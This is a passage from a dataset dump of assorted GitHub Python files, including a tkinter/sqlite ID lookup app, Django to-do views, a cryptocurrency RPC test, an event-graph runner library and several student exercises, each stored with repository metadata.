NOT EXISTS idAddress(_id integer PRIMARY KEY, studentName text, ID integer)\")\r\nroot = tk.Tk()\r\nroot.title(\"ID List\")\r\nsubmit_label = tk.Label(root, text=\"Add a New person to the Data Base : \", font=\"Tahoma 17 underline\")\r\nsubmit_label.grid(row=0, column=0)\r\ndef submit():\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n ign = nameA.get()\r\n idAdr = idAdress.get()\r\n\r\n c.execute(\"SELECT * FROM idAddress WHERE studentName=? 
AND ID=?\", (ign, int(idAdr)))\r\n a = c.fetchall()\r\n if a == []:\r\n c.execute(\"\"\"INSERT INTO idAddress(studentName, ID) VALUES(:f_name, :id_name)\"\"\",\r\n {'f_name': ign.lower(), 'id_name': idAdr})\r\n conn.commit()\r\n conn.close()\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n else:\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n print(\"FUCK YOU\")\r\nc = conn.cursor() #Create cursor\r\n# c.execute(\"\"\"select * from id\"\"\")\r\n#create a table\r\nnameA = tk.Entry(root, width=40)\r\nnameA.grid(row=1, column=2)\r\nidAdress = tk.Entry(root, width=40)\r\nidAdress.grid(row=2, column=2)\r\nname_label = tk.Label(root, text=\"Enter full name : \",fg='blue')\r\nname_label.grid(row=1, column=0)\r\nid_label = tk.Label(root, text=\"Enter the ID number : \", fg='blue')\r\nmyButton = tk.Button(root, text=\"Click To Enter a new name to the data base\", command=submit)\r\nmyButton.grid(row=3, column=2)\r\nid_label.grid(row=2, column=0)\r\nconn.commit() #Commit changes\r\nsubmit_label = tk.Label(root, text=\"Searching given an ID : \", font=(\"Tahoma\", 17))\r\nsubmit_label.grid(row=4, column=0)\r\nprint_label1 = tk.Label(root)\r\ndef search():\r\n global print_label1\r\n print_label1.destroy()\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n idA = IdAdress.get()\r\n c.execute(\"SELECT studentName FROM idAddress WHERE ID=?\", (str(idA),))\r\n a = str(c.fetchall())\r\n b = \"\"\r\n for element in a:\r\n if element.isalpha() or element == \" \":\r\n b+= element\r\n\r\n print_label1 = tk.Label(root, text=b)\r\n print_label1.grid(row=6, column=0)\r\n conn.commit()\r\n conn.close()\r\nIdAdress = tk.Entry(root, width=50)\r\nIdAdress.grid(row=5, column=2)\r\nIdLabel = tk.Label(root,fg='red', text=\"Enter the Desired ID : \")\r\nIdLabel.grid(row=5, column=0)\r\nmyButton = tk.Button(root, text=\"Click To Search\", command=search)\r\nmyButton.grid(row=6, column=2)\r\nsubmit_label = 
tk.Label(root, text=\"Searching given Name : \", font=(\"Tahoma\", 17))\r\nsubmit_label.grid(row=7, column=0)\r\nsubmit_label = tk.Label(root, text=\"Doesn't have to be Accurate \", font=\"Tahoma 8 bold\")\r\nsubmit_label.grid(row=9, column=0)\r\nprint_label = tk.Label(root)\r\ndef search_name():\r\n global print_label\r\n print_label.destroy()\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n idA = NameAdr.get()\r\n idB = \"%\" + idA + \"%\"\r\n c.execute(\"SELECT studentName, ID FROM idAddress WHERE studentName LIKE ?\", (idB.lower(),))\r\n a = str(c.fetchall())\r\n listofshit = [\"{\", \"}\", \"[\", \"]\"]\r\n for i in listofshit:\r\n a = a.replace(i, \"\")\r\n\r\n print_label = tk.Label(root, text=a)\r\n print_label.grid(row=10, column=0)\r\n conn.commit()\r\n conn.close()\r\nNameAdr = tk.Entry(root, width=50)\r\nNameAdr.grid(row=8, column=2)\r\nNameLabel = tk.Label(root, fg='purple', text=\"Enter the Desired Name : \")\r\nNameLabel.grid(row=8, column=0)\r\nmyButton = tk.Button(root, text=\"Click To Search\", command=search_name)\r\nmyButton.grid(row=9, column=2)\r\ndef delete_by_id():\r\n conn = sqlite3.connect('id.db')\r\n a = int(DeleteID.get())\r\n conn.execute(\"DELETE FROM idAddress WHERE ID=?\", (a,))\r\n conn.commit()\r\n conn.close()\r\n DeleteID.delete(0, 'end')\r\nDeleteID = tk.Entry(root, width=50)\r\nDeleteID.grid(row=13 ,column=2)\r\nDeleteLabel = tk.Label(root, text=\"Delete ID : \", font=\"Tahoma 18\")\r\nDeleteLabel.grid(row=12, column=0)\r\nDeleteLabel2 = tk.Label(root, text=\"Enter the ID : \", fg=\"pink\", font=\"bold\")\r\nDeleteLabel2.grid(row=13, column=0)\r\ndeletebutton = tk.Button(root, text=\"Enter to Delete\", command=delete_by_id)\r\ndeletebutton.grid(row=14, column=2)\r\n#Close Connection\r\nconn.close()\r\n# function that cleans the 
information\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"tzlilLV97/IDconsole","sub_path":"newmain.py","file_name":"newmain.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36739641316","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Item\nfrom .forms import ItemForm\n\n\n# Create your views here.\ndef get_todo_list(request):\n items = Item.objects.all()\n # context dic is the way we pas var to the template\n # The key should correspond to the var we want to pass\n context = {\n 'items': items\n }\n return render(request, 'todo/todo_list.html', context)\n\n\ndef add_item(request):\n if request.method == 'POST':\n # Use the form template to populate the form automatically\n # with the request.post method\n form = ItemForm(request.POST)\n # Check the form validity\n if form.is_valid():\n # save the form\n form.save() # corresp to Item.objects.create(name=name, done=done)\n return redirect('get_todo_list')\n\n # Get the forms info\n # name = request.POST.get('item_name')\n # done = 'done' in request.POST\n\n # Create an Item in the db\n # Item.objects.create(name=name, done=done)\n\n form = ItemForm()\n context = {\n 'form': form\n }\n return render(request, 'todo/add_item.html', context)\n\n\ndef edit_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n\n if request.method == 'POST':\n form = ItemForm(request.POST, instance=item)\n if form.is_valid():\n form.save()\n return redirect('get_todo_list')\n\n # the instance=item param is to tell the form to prepopulate\n # with the item retreived above\n form = ItemForm(instance=item)\n context = {\n 'form': form\n }\n return render(request, 'todo/edit_item.html', context)\n\n\ndef toggle_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n item.done = not item.done\n item.save()\n return redirect('get_todo_list')\n\n\ndef 
delete_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n item.delete()\n return redirect('get_todo_list')\n","repo_name":"Tom-Nagy/hello-django","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3734917655","text":"from test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import assert_equal\n\nLABELS_TO_TEST = frozenset({\"\" , \"New №…Ё $<#>&!б€б‹аБаА Label\"})\n\nclass GetAddressInfoLabelsPurposeDeprecationTest(BitcoinTestFramework):\n def set_test_params(self):\n self.num_nodes = 2\n self.setup_clean_chain = False\n # Start node[0] with -deprecatedrpc=labelspurpose and node[1] without.\n self.extra_args = [[\"-deprecatedrpc=labelspurpose\"], []]\n\n def skip_test_if_missing_module(self):\n self.skip_if_no_wallet()\n\n def test_labels(self, node_num, label_name, expected_value):\n node = self.nodes[node_num]\n address = node.getnewaddress()\n if label_name != \"\":\n node.setlabel(address, label_name)\n self.log.info(\" set label to {}\".format(label_name))\n labels = node.getaddressinfo(address)[\"labels\"]\n self.log.info(\" labels = {}\".format(labels))\n assert_equal(labels, expected_value)\n\n def run_test(self):\n \"\"\"Test getaddressinfo labels with and without -deprecatedrpc flag.\"\"\"\n self.log.info(\"Test getaddressinfo labels with -deprecatedrpc flag\")\n for label in LABELS_TO_TEST:\n self.test_labels(node_num=0, label_name=label, expected_value=[{\"name\": label, \"purpose\": \"receive\"}])\n\n self.log.info(\"Test getaddressinfo labels without -deprecatedrpc flag\")\n for label in LABELS_TO_TEST:\n self.test_labels(node_num=1, label_name=label, expected_value=[label])\n\n\nif __name__ == '__main__':\n 
GetAddressInfoLabelsPurposeDeprecationTest().main()\n","repo_name":"monacoinproject/monacoin","sub_path":"test/functional/rpc_getaddressinfo_labels_purpose_deprecation.py","file_name":"rpc_getaddressinfo_labels_purpose_deprecation.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"33"} +{"seq_id":"33218307672","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n# from django.contrib.auth.models import User\n\n\nclass SetUp(models.Model):\n # user id, 一个用户可以有多个配置\n user = models.ForeignKey(\n User,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 配置名字: 自己取一个名字\n name = models.CharField(\"目标名称\", max_length=30)\n # 每周完成几次\n times = models.PositiveIntegerField(\"打卡次数\", default=3)\n # 创建时间\n created_time = models.DateTimeField(auto_now_add=True)\n # 更新时间\n update_time = models.DateTimeField(auto_now=True)\n # 状态, 生效, 停止\n status = models.BooleanField('目标状态', default=1)\n\n\nclass Balance(models.Model):\n # user id, 一个用户只能有一个余额\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n # 余额\n amount = models.PositiveIntegerField(default=0)\n # 创建时间\n created_time = models.DateTimeField(auto_now_add=True)\n # 更新时间\n update_time = models.DateTimeField(auto_now=True)\n\n\nclass ClockIn(models.Model):\n # user id, 一个用户可以有很多打卡\n user = models.ForeignKey(\n User,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 打卡种类\n setup = models.ForeignKey(\n SetUp,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 图片 0\n image_0 = models.ImageField()\n # 打卡时间\n created_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = [\"-id\"]\n","repo_name":"dongtianyi/xiaomubiao","sub_path":"goal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"1664204082","text":"__author__ = 'jcastro'\n\nfrom tournament import Tournament\n\nimport abc\n\n\nclass Game(object):\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def calculate_score(self, score):\n \"\"\"Returns final score for player\"\"\"\n\n\nclass Basketball(Game):\n\n point_position = {\n 'G': [2, 3, 1],\n 'F': [2, 2, 2],\n 'C': [2, 1, 3]\n }\n\n def calculate_score(self, game):\n score_player = game['score']\n position_player = game['position']\n score_total = 0\n if position_player in self.point_position:\n score_position = self.point_position[position_player]\n\n for i in range(len(score_player)):\n score_total += int(score_player[i]) * int(score_position[i])\n\n return score_total\n\n# player 1;nick1;4;Team A;G;10;2;7\n# player 2;nick2;8;Team A;F;0;10;0\n# player 3;nick3;15;Team A;C;15;10;4\n# player 4;nick4;16;Team B;G;20;0;0\n# player 5;nick5;23;Team B;F;4;7;7\n# player 6;nick6;42;Team B;C;8;10;0\n\nmy_tournament = Tournament()\n\nmy_tournament.create_game(\"basketball\", Basketball())\nstrPlayer = \"player 1;nick1;4;Team A;G;10;2;7\"\nstrPlayer2 = \"player 2;nick2;8;Team A;F;0;10;0\"\nstrPlayer3 = \"player 4;nick4;16;Team B;G;20;0;0\"\nmy_tournament.parser(\"basketball\", strPlayer)\nmy_tournament.parser(\"basketball\", strPlayer2)\nmy_tournament.parser(\"basketball\", strPlayer3)\n\nmy_tournament.create_game(\"basketballHARD\", Basketball())\nstrPlayer = \"player 1;nick1;4;Team A;G;10;2;7\"\nstrPlayer2 = \"player 2;nick2;8;Team A;F;0;10;0\"\nstrPlayer3 = \"player 4;nick4;16;Team B;G;230;0;0\"\nmy_tournament.parser(\"basketballHARD\", strPlayer)\nmy_tournament.parser(\"basketballHARD\", strPlayer2)\nmy_tournament.parser(\"basketballHARD\", strPlayer3)\n\nprint(my_tournament.mvp())","repo_name":"jcastrojob/kata_tucan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"23950829961","text":"#!/bin/env python\n\nimport os, os.path\n\nucf101_frm_root = '/data1/wangyf/dataset/ucf101/ucf101_frm/'\nlabel_file = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/classInd.txt')\n\nvideo_types = []\nfor line in label_file:\n\tvideo_type_name = line.split()[1]\n#\tprint(video_type_name)\n\tvideo_types.append(video_type_name)\n\nlabel_file.close()\n\ntest_list = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/testlist01.txt','r')\ntest_list_apdated = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/test.txt','w')\nnew_line = \"\"\nfor line in test_list:\n\ttype_name = line.split('/')[0];\n#\tprint('type_name:'+type_name)\n\tline = line.split('\\r')[0] \n\tframe_dir = ucf101_frm_root + line\n#\tprint('frame_dir:'+frame_dir)\n\tframe_sum = len([name for name in os.listdir(frame_dir) if os.path.isfile(os.path.join(frame_dir, name))])\n#\tprint('frame sum: '+str(frame_sum))\n\torder = video_types.index(type_name) + 1\n#\tprint('order:'+str(order))\n\tmiddle_frame = frame_sum / 2\n\tif middle_frame <= 0:\n\t\tprint('middle<=0, frame_dir:'+frame_dir) \n\tnew_line = '%s%06d.jpg %d\\n' %(line, middle_frame, order-1) \n\ttest_list_apdated.write(new_line)\n#\tfor i in range(1,frame_sum+1):\n#\t\tnew_line = '%s%06d.jpg %d\\n' %(frame_dir, i, order) \n#\t\tprint(new_line)\n#\t\ttest_list_apdated.write(new_line)\n\ntest_list.close()\ntest_list_apdated.close()\n\n\n","repo_name":"vra/Python-Tools","sub_path":"create_test_list_file.py","file_name":"create_test_list_file.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"73175972575","text":"from PIL import Image\nimport numpy as np\nimport skvideo.io\nfrom skimage.util import img_as_float, img_as_ubyte\nimport sys\nimport argparse\nimport math\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', 
type=str)\nparser.add_argument('--output', type=str, default='out.png')\nparser.add_argument('--start', type=int, default=0)\nparser.add_argument('--interval', type=int, default=70)\nparser.add_argument('--ymin', type=int, default=-100)\nparser.add_argument('--ymax', type=int, default=-10)\nargs = parser.parse_args()\n\nvideodata = img_as_float(skvideo.io.vread(args.input))\nvideodata = videodata[args.start:, :, :, :]\nframes, h, w, channels = videodata.shape\n\nsingle_h = args.ymax - args.ymin\nnum_stacked = math.floor(frames / args.interval)\n\ncoalesced = np.zeros((num_stacked*single_h, w, channels))\nfor i in range(num_stacked):\n coalesced[single_h*i:single_h*(i+1),:,:] = \\\n videodata[i*args.interval,args.ymin:args.ymax,:,:]\n\nimg = Image.fromarray(img_as_ubyte(coalesced), 'RGB')\nimg.save(args.output)\nimg.show()\n","repo_name":"davepagurek/boneless","sub_path":"scripts/stack_frames.py","file_name":"stack_frames.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"1182037720","text":"from random import uniform\n\n\ndef transfer_list_in_str(list_in: list) -> str:\n \"\"\"Преобразует каждый элемент списка (вещественное число) в строку вида ' руб коп' и\n формирует из них единую строковую переменную разделяя значения запятой.\"\"\"\n str_out = ''\n for i in list_in[:-1]:\n rub = int(i)\n cop = str(int(i*100%100))\n str_out += f\"{rub} руб {cop.zfill(2)} коп, \"\n rub = int(list_in[-1])\n cop = str(int(list_in[-1] * 100 % 100))\n str_out += (f\"{rub} руб {cop.zfill(2)} коп\")\n return str_out\n\n\nmy_list = [round(uniform(10, 100), 2) for _ in range(1, 16)] # автоматическая генерация случайных 15 чисел\nprint(f'Исходный список: {my_list}')\nresult_1 = transfer_list_in_str(my_list)\nprint(result_1)\n\n\ndef sort_prices(list_in: list) -> list:\n \"\"\"Сортирует вещественные числа по возрастанию, не создавая нового списка\"\"\"\n list_in.sort()\n return 
list_in\n\n\nprint(\"ID my_list = \", id(my_list))\nresult_2 = sort_prices(my_list)\nprint(\"ID result_2 = \", id(result_2))\nprint(transfer_list_in_str(result_2))\n\n\ndef sort_price_adv(list_in: list) -> list:\n \"\"\"Создаёт новый список и возвращает список с элементами по убыванию\"\"\"\n list_out = sorted(list_in, reverse=True)\n return list_out\n\n\nresult_3 = sort_price_adv(my_list)\nprint(transfer_list_in_str(result_3))\n\n\ndef check_five_max_elements(list_in: list) -> list:\n \"\"\"Проверяет элементы входного списка вещественных чисел и возвращает\n список из ПЯТИ максимальных значений\"\"\"\n list_out = sorted(list_in, reverse=True)[:5]\n return list_out\n\n\nresult_4 = check_five_max_elements(my_list)\nprint(transfer_list_in_str(result_4))\n","repo_name":"juliyamakutu/python_again","sub_path":"Bryukhovskikh_Yuliya_dz_2/task_2_5.py","file_name":"task_2_5.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"25219549541","text":"length = int(input(\"Length Of List\"))\n\npointlesslist=[]\n\nprint(\"Input the List elements:-\\n\")\n\nfor i in range(1,length+1):\n print(\"The Element\",i,\":-\")\n pointlesslist.append(input())\n\n\nvarele = pointlesslist[length-1]\n\nfor i in range(0,length-1):\n temp=pointlesslist[i]\n pointlesslist[i]=pointlesslist[i+1]\n pointlesslist[length-1]=temp\n\nfor i in range(0,length-1):\n print(\"The Element\",i,\":-\")\n pointlesslist[i]\n\n\n\n","repo_name":"AnushSomasundaram/Compsci_with_python","sub_path":"compsci_with_python/chap2/trainofelements.py","file_name":"trainofelements.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40957811576","text":"from Deck import Deck\nimport argparse\n\nfrom Simul import Simul\n\n\ndef main():\n \"\"\"\n PRE:\n 1. Good lands needed\n 2. CMC (Turn allowed)\n 3. 
Good lands needed <= CMC (Turn allowed)\n i.e: Wrath of god is {2ww}, so --> Good lands needed = 2 (ww colored sources), cmc=4 (Turn to be casted)\n :return:\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"nLands\", help=\"Total number of lands in the deck. (int)\", type=int)\n parser.add_argument(\"cmc\", help=\"CMC of the card desired to cast. (int)\", type=int)\n parser.add_argument(\"colors_needed\", help=\"Number of colored sources to cast the spell. (int)\", type=int, default=0)\n parser.add_argument(\"nCards\", help=\"Total number of cards in the deck. (int)\", type=int, default=60)\n args = parser.parse_args()\n n_lands = args.nLands\n if n_lands <= 3:\n print(\"The number of lands can't be smaller than 4!\")\n return -1\n\n cmc = args.cmc\n if n_lands < cmc:\n print(\"Can't cast a spell without enough lands in the deck!\")\n return -1\n\n n_cards = args.nCards\n if n_lands >= n_cards:\n print(\"The number of lands can't be equal or higher to the number of cards in the deck!\")\n return -1\n colors_needed = args.colors_needed\n simulator = Simul()\n success_rate, curving_landrops, mulligan_rate, good_lands = simulator.start_simul(n_lands, cmc, n_cards,\n colors_needed)\n print(\"Needed good lands: %d, Casting success rate: %f, Curving landrops rate: %f, Mulligan rate: %f\"\n % (good_lands, success_rate, curving_landrops, mulligan_rate))\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CLKBlu3/Mtg_Mana_Optimization","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36823042170","text":"\"\"\"Runners are actually runtime for statically built graph.\"\"\"\n\nimport time\nimport asyncio\nimport functools\nimport traceback\nfrom typing import List, Type, Deque, Optional, Awaitable, DefaultDict, cast\nfrom collections import deque\n\nfrom blocks.graph import Graph\nfrom 
blocks.types import Event, Source, Processor, AsyncSource, EventOrEvents, AsyncProcessor\nfrom blocks.logger import logger\n\nSyncProcessors = DefaultDict[Type[Event], List[Processor]]\n\n\nclass Runner(object):\n \"\"\"\n Allows to actually run graph.\n\n - Checks sources for new events,\n - handles internal queue,\n - passes events to a specific processors,\n - check conditions for termination\n - proceeds actual shutdown of the app.\n \"\"\"\n\n def __init__(self, graph: Graph, terminal_event: Optional[Type[Event]]) -> None:\n \"\"\"\n Init runner instance.\n\n :param graph: Computational graph to execute.\n :param terminal_event: Special event which simply stops execution, when processed.\n \"\"\"\n if graph.contains_async_blocks:\n raise RuntimeError('Blocks graph contains async blocks, must be run by AsyncRunner')\n\n self._sources = cast(List[Source], graph.sources)\n self._processors = cast(SyncProcessors, graph.processors)\n self._q: Deque[Event] = deque()\n self._alive = True\n self._terminal_event = terminal_event\n\n def run(self, interval: float, once: bool) -> None:\n \"\"\"\n Start execution.\n\n :param interval: Minimal timeout (seconds) between repetition of the whole computational sequence.\n :param once: If True, executes the whole computational sequence only once, otherwise won't stop until\n specific conditions (such as terminal event) will occur.\n \"\"\"\n self._tick()\n if not once:\n while self._alive:\n start = time.perf_counter()\n self._tick()\n delta = time.perf_counter() - start - interval\n if delta < 0:\n time.sleep(abs(delta))\n self._close_resources()\n\n def stop(self) -> None:\n \"\"\"Stop the execution.\"\"\"\n self._alive = False\n\n def _append_events(self, events: Optional[EventOrEvents]) -> None:\n if events is None:\n return None\n elif isinstance(events, (list, tuple)):\n for event in reversed(events):\n if not self._is_terminal_event(event):\n self._q.appendleft(event)\n elif not self._is_terminal_event(events):\n 
self._q.appendleft(events)\n\n def _is_terminal_event(self, event: Event) -> bool:\n if self._terminal_event is not None and isinstance(event, self._terminal_event):\n self.stop()\n return True\n return False\n\n def _close_resources(self) -> None:\n self._close_sources()\n self._close_processors()\n\n def _close_sources(self) -> None:\n for source in self._sources:\n source.close()\n\n def _close_processors(self) -> None:\n closed = set()\n for processors in self._processors.values():\n for processor in processors:\n identifier = id(processor)\n if identifier not in closed:\n processor.close()\n closed.add(identifier)\n\n def _get_new_events(self) -> None:\n for source in self._sources:\n self._append_events(source())\n\n def _process_event(self, event: Event) -> None:\n for processor in self._processors[type(event)]:\n try:\n events = processor(event)\n except Exception:\n self.stop()\n logger.error('Execution failed during processing the event: {0}({1}) {2}'.format(\n processor.__class__.__name__, event.__class__.__name__, event,\n ))\n logger.error(traceback.format_exc())\n else:\n self._append_events(events)\n\n def _tick(self) -> None:\n self._get_new_events()\n while self._q:\n event = self._q.popleft()\n self._process_event(event)\n\n\nclass AsyncRunner(object):\n \"\"\"Same as Runner, but for async/await syntax.\"\"\"\n\n def __init__(self, graph: Graph, terminal_event: Optional[Type[Event]]) -> None:\n \"\"\"\n Init async runner instance.\n\n :param graph: Computational graph to execute.\n :param terminal_event: Special event which simply stops execution, when processed.\n \"\"\"\n self._sources = graph.sources\n self._processors = graph.processors\n self._q: Deque[Event] = deque()\n self._alive = True\n self._terminal_event = terminal_event\n\n async def run(self, interval: float, once: bool) -> None:\n \"\"\"\n Start execution.\n\n :param interval: Minimal timeout (seconds) between repetition of the whole computational sequence.\n :param once: If True, 
executes the whole computational sequence only once, otherwise won't stop until\n specific conditions (such as terminal event) will occur.\n \"\"\"\n await self._tick()\n if not once:\n while self._alive:\n start = time.perf_counter()\n await self._tick()\n delta = time.perf_counter() - start - interval\n if delta < 0:\n await asyncio.sleep(abs(delta))\n await self._close_resources()\n\n def stop(self) -> None:\n \"\"\"Stop the execution.\"\"\"\n self._alive = False\n\n def _append_events(self, events: Optional[EventOrEvents]) -> None:\n if events is None:\n return None\n elif isinstance(events, (list, tuple)):\n for event in events:\n if not self._is_terminal_event(event):\n self._q.append(event)\n elif not self._is_terminal_event(events):\n self._q.append(events)\n\n def _is_terminal_event(self, event: Event) -> bool:\n if self._terminal_event is not None and isinstance(event, self._terminal_event):\n self.stop()\n return True\n return False\n\n async def _close_resources(self) -> None:\n await self._close_sources()\n await self._close_processors()\n\n async def _close_processors(self) -> None:\n closed = set()\n for processors in self._processors.values():\n for processor in processors:\n identifier = id(processor)\n if identifier not in closed:\n if isinstance(processor, AsyncProcessor):\n await processor.close()\n else:\n processor.close()\n closed.add(identifier)\n\n async def _close_sources(self) -> None:\n for source in self._sources:\n if isinstance(source, AsyncSource):\n await source.close()\n else:\n source.close()\n\n async def _get_new_events(self) -> None:\n tasks = []\n loop = asyncio.get_running_loop()\n for source in self._sources:\n if isinstance(source, AsyncSource):\n task: Awaitable[EventOrEvents] = loop.create_task(source())\n else:\n task = loop.run_in_executor(None, source)\n tasks.append(task)\n for events in await asyncio.gather(*tasks):\n self._append_events(events)\n\n async def _process_events(self) -> None:\n loop = 
asyncio.get_running_loop()\n tasks = []\n while self._q:\n event = self._q.popleft()\n for processor in self._processors[type(event)]:\n if isinstance(processor, AsyncProcessor):\n task: Awaitable[EventOrEvents] = loop.create_task(processor(event))\n else:\n prepared = functools.partial(processor, event)\n task = loop.run_in_executor(None, prepared)\n tasks.append(task)\n\n for events in await asyncio.gather(*tasks):\n self._append_events(events)\n\n if self._q:\n await self._process_events()\n\n async def _tick(self) -> None:\n await self._get_new_events()\n await self._process_events()\n","repo_name":"akoshel/typed-blocks","sub_path":"blocks/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"33837263305","text":"def contracting(l):\r\n diff=abs(l[0]-l[1])\r\n for i in range(1,len(l)-1):\r\n new_diff=abs(l[i]-l[i+1])\r\n if new_diffl[i+1] and l[i]>l[i-1]:\r\n hc+=1\r\n elif l[i] C3\r\n for j in range(n // 2):\r\n for i in range(n):\r\n m[i][j], m[i][n - 1 - j] = m[i][n - 1 - j], m[i][j]\r\n #transposing the matrix\r\n for i in range(n):\r\n for j in range(i):\r\n m[i][j], m[j][i] = m[j][i], m[i][j]\r\n return m\r\n","repo_name":"arwazkhan189/NPTEL---Programming-Data-Structures-And-Algorithms-Using-Python","sub_path":"Week 3/Week 3 Assignment.py","file_name":"Week 3 Assignment.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"30643727583","text":"import numpy as np\r\nimport features\r\nimport os\r\nimport pickle\r\n\r\nroots = ['C', 'Db', 'D', 'Eb', 'E', 'F', 'F#', 'G', 'Ab', 'A', 'Bb', 'B']\r\nchords_type = ['', 'm']\r\nchords = [x+y for x in roots for y in chords_type]\r\nchords.append('-')\r\nchords_dict = {k: v for v, k in enumerate(sorted(set(chords)))} # total 25 chords\r\n\r\n\r\ndef wav_list_to_feature_list(wav_list):\r\n 
'''\r\n :param wav_list: lsit of the wav files\r\n :return: list of valid wav files and features\r\n '''\r\n valid_wav_list = []\r\n features_list = []\r\n for wav_path in wav_list:\r\n feature = features.compute_mfcc_example(wav_path)\r\n if feature is not None:\r\n valid_wav_list.append(wav_path)\r\n features_list.append(feature)\r\n else:\r\n print(wav_path)\r\n\r\n return valid_wav_list, features_list\r\n\r\n\r\ndef get_wav_list(data_path, chord_path):\r\n '''\r\n :param data_path: data directory\r\n :param data_path: chord dictionary path\r\n :return: list of wav file paths\r\n '''\r\n paths = []\r\n with open(chord_path, 'rb') as f:\r\n chords = pickle.load(f)\r\n for path, _, files in os.walk(data_path):\r\n for file in files:\r\n if file.endswith('.wav') and len(chords[file]) == 96:\r\n paths.append(path + '/' + file)\r\n\r\n return paths\r\n\r\n\r\ndef get_label_list(chord_path, wav_paths):\r\n '''\r\n :param chord_path: path of the chord info file\r\n :param wav_paths: paths of wav files\r\n :return: list of labels of wav files (each wav file has 96 chords)\r\n '''\r\n label_list = []\r\n with open(chord_path, 'rb') as f:\r\n chord_dict = pickle.load(f)\r\n\r\n for path in wav_paths:\r\n wav_name = path[path.rfind('/')+1:] # Maybe need to change '/' to another character\r\n\r\n label_list.append(chord_dict[wav_name])\r\n\r\n return label_list\r\n\r\n\r\ndef encode_label(labels):\r\n '''\r\n :param labels: labels from the same wav file\r\n :return: numpy array with (96, number of labels) shape, one-hot encoded\r\n '''\r\n\r\n # create one-hot encoded array\r\n label_array = np.zeros((len(labels), len(chords_dict)), dtype=np.int32)\r\n for i, label in enumerate(labels):\r\n label_pos = chords_dict[label]\r\n label_array[i, label_pos] = 1\r\n return 
label_array\r\n\r\n\r\n\r\n\r\n","repo_name":"jiminsun/IAML_2018","sub_path":"Project3/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38127764711","text":"#!/usr/local/bin/python3.9\n\n# Filnamn: kap. 9, sid. 109 - returvärde.py\n\n# Kapitel 9 - Funktioner\n# Programmering 1 med Python - Lärobok\n\n# Funktioner med returvärde \n\n# Beräkna och returnera medianen av en numerisk lista \ndef median(lista):\n # Vi börjar med att sortera listan för att hitta det mellersta värdet \n lista.sort() # sort() är en inbyggd metod/funktion i Python\n # Är det ett udda eller jämt antal numeriska argument så ska medianen tas \n # fram på olika sätt\n if len(lista) % 2:\n # Index måste vara av typen heltal när jag sedan använder det som \n # argument till lista, därav heltalsdivision\n index = len(lista) // 2 # För att få fram index för mellersta talet\n median = float(lista[index]) # Hämta median värdet\n else:\n # Är listan jämn i antal måste en medelberäkning ske på de två \n # mellersta talen\n index = (len(lista) // 2)-1 # För att få fram index för det första talet\n median = float((lista[index] + lista[index + 1]) / 2)\n return median\n\n# Huvudprogram\nlistaEtt = [4, 5, 6] \nlistaTvå = [3, 5, 7, 9] \nprint('Medianen för listaEtt:', listaEtt, 'är', median(listaEtt))\nprint('Medianen för listaTvå:', listaTvå, 'är', 